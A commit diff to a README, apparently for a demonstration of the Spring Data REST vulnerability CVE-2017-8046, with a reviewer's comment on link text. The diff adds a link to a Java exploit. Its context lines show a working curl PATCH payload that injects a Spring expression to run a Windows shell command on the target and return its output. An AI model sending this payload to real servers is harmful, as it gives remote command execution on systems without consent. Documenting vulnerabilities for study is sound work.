Commit 2f9d849

author
Sardella Antonio Francesco
committed
Added reference to exploit software.
1 parent b98276e commit 2f9d849

1 file changed

+2
-0
lines changed

README.md

Lines changed: 2 additions & 0 deletions
@@ -53,6 +53,8 @@ On Windows, a `cmd /c dir` command, and other similar commands, can be launched
5353
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"cmd \" + T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F)) + \"c dir\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"
5454
```
5555

56+
A Java program to exploit this vulnerability can be found [here](https://github.com/m3ssap0/spring-break_cve-2017-8046).
57+
5658
## Authors
5759

5860
* **Antonio Francesco Sardella** - *implementation* - [m3ssap0](https://github.com/m3ssap0)
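
Review bot: The link text in the added sentence is just "here", which tells a reader nothing about the destination before they follow it. Name the target in the link text, for example `[spring-break_cve-2017-8046](https://github.com/m3ssap0/spring-break_cve-2017-8046)`. The sentence also sits directly between the closing fence of the Windows `curl` example and `## Authors` with no heading of its own, so it reads as part of the Windows section; a short heading above it, or moving it to wherever the README introduces the vulnerability, would make its scope clear.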
